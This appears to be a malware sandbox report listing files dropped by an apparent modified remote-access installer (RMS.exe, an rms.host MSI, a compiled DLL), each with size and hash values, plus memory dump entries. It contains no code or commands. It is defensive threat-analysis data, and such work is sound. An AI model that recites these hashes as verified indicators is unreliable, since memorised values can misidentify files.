C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ffa32b2c4ac7359fcb9b7d40f0c2200d

SHA1
c5b6af15326b79ac727bd4635496473a41da9595

SHA256
44c067437cd47c9450ee58a1a738d43587ac66563f9be5cebb558374acf2940a

SHA512
bd1c5d53349060f2a43702d0a0319aa079af3f3844e9b407b8af9e6016eba6923a49918d335ca5201f4008098c19801b2d85757f21171fd337bf26d20cda8cbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi

Filesize
7.4MB

MD5
73e578a44265558d3ace212869d43cbb

SHA1
d2c15578def8996ed0ae4a44754055b774b095a7

SHA256
8a6945ead42d78d963d6f2e126eebb89c0e82b02c389d4badcaa837ff49bf7f4

SHA512
fe661e19899a6f749a180e5b312fcebb2963acc92720d1c6cabba22b0ffd250f1930c9dac62f789cd4b99aff86ef0f3944ae52a583e2c1be57c9fca391be9bf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF98D.tmp

Filesize
1KB

MD5
1b8727dfe0a568a64e11979c5e2ce69b

SHA1
5d03c42e44ac50c56dc01dded80ce6c480ddd12f

SHA256
aed53210daea24de370b52c4794b71651312d9d7e1d7763474062221cac0e21b

SHA512
1429be297045447a238547f806e9c1c302a54bfe3e74a1551bd1fe7f4f90415442b0e6bb0ee6f6f1482f2f35b7f2a418935ad87c0c927d6c5c8b31b35a289469

Download Submit
C:\Users\Admin\AppData\Local\Temp\RMS.exe

Filesize
8.3MB

MD5
73f351beae5c881fafe36f42cde9a47c

SHA1
dc1425cfd5569bd59f5d56432df875b59da9300b

SHA256
a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

SHA512
f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

Download Submit
C:\Users\Admin\AppData\Local\Temp\RMS.exe

Filesize
8.3MB

MD5
73f351beae5c881fafe36f42cde9a47c

SHA1
dc1425cfd5569bd59f5d56432df875b59da9300b

SHA256
a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824

SHA512
f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

Download Submit
C:\Users\Admin\AppData\Local\Temp\qg2xtijr.dll

Filesize
3KB

MD5
74941c8583ed5c0a682f20be1ad18190

SHA1
702aeb34229b060e27ba0a1c319ee5ff3b0d980b

SHA256
0477a4aaa92012340954c758e403d13d93f6fb72af9e3fd68039c487e4dbd345

SHA512
7aaf4d65e1f40f2ff9560af85e54d70c96e92c89854d0525ae19e1c7154e2217e440d081b8f16febb1eae514522d9ae84668b0e704f5ae32c991d414b9ff4976

Download Submit
C:\Users\Admin\AppData\Local\Temp\qg2xtijr.pdb

Filesize
11KB

MD5
55147b5a6ae0d76626d8fd06694b7fd5

SHA1
506e53ad9ec02537c9ca40ab116e0fe025753c60

SHA256
4a42ef2a930144119efc77085a2b7620faa657032e5303f859355201db44a172

SHA512
f1948ee3571591b22ed5e03ab2b008eda01d714618cb56183a281d79dd59f86d7eaa063808f92d9ef932efdc7ab2bb34c34340cd59f74eb495cbe701a6a38893

Download Submit
C:\Windows\Installer\MSIEDF2.tmp

Filesize
125KB

MD5
b0bcc622f1fff0eec99e487fa1a4ddd9

SHA1
49aa392454bd5869fa23794196aedc38e8eea6f5

SHA256
b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081

SHA512
1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCF98C.tmp

Filesize
652B

MD5
6279b84bf5d837ad8d2397d7f6263abb

SHA1
affd6a002661ac90eaefc5b0f7bdf5939e4f65a5

SHA256
d28bb344e4b49bcfaca73092b0d2ca90d7016a5029eb7a0cad8ef3ff414b151d

SHA512
ead58029e9a99c77b64db0605ea324c9538e4ee7d6216271d34c1d87c2d7696a9e9a998441e79693b228472dce9993170684191b6c0adb7f159aa38cce32300c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qg2xtijr.0.cs

Filesize
447B

MD5
1640a04633fee0dfdc7e22c4f4063bf6

SHA1
3cb525c47b5dd37f8ee45b034c9452265fba5476

SHA256
55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

SHA512
85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qg2xtijr.cmdline

Filesize
309B

MD5
bafbf2e40cec8a40fb534c74190a83cb

SHA1
6c55d60ef66bb7df66df6734a115b3f67b4c427c

SHA256
df36189e8ffc0bfdae8c05529faf864319d787481bbf652b3b83f0636ae6314d

SHA512
c94efd3bf83a3c0abc73c49cd3cbc058bc4ed284992572a926e83c1b01d78dc042228e3d779e093bb3d50ca178084f66a1387dc93b0b9bbfbaf9293c10a84230

Download Submit
\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe

Filesize
6.0MB

MD5
c9704931d887685d96ce92d637d84045

SHA1
0875a71e9118ded121d92f3f46a3af1ec8380f8b

SHA256
0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826

SHA512
3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260

Download Submit
\Windows\Installer\MSIEDF2.tmp

Filesize
125KB

MD5
b0bcc622f1fff0eec99e487fa1a4ddd9

SHA1
49aa392454bd5869fa23794196aedc38e8eea6f5

SHA256
b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081

SHA512
1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7

Download Submit
memory/1080-87-0x00000000751C1000-0x00000000751C3000-memory.dmp

Filesize
8KB

Download
memory/1228-84-0x000000001B120000-0x000000001B139000-memory.dmp

Filesize
100KB

Download
memory/1228-54-0x000007FEF2CE0000-0x000007FEF3D76000-memory.dmp

Filesize
16.6MB

Download
memory/1228-55-0x000007FEF1FF0000-0x000007FEF2B4D000-memory.dmp

Filesize
11.4MB

Download
memory/1300-65-0x000007FEFB871000-0x000007FEFB873000-memory.dmp

Filesize
8KB

Download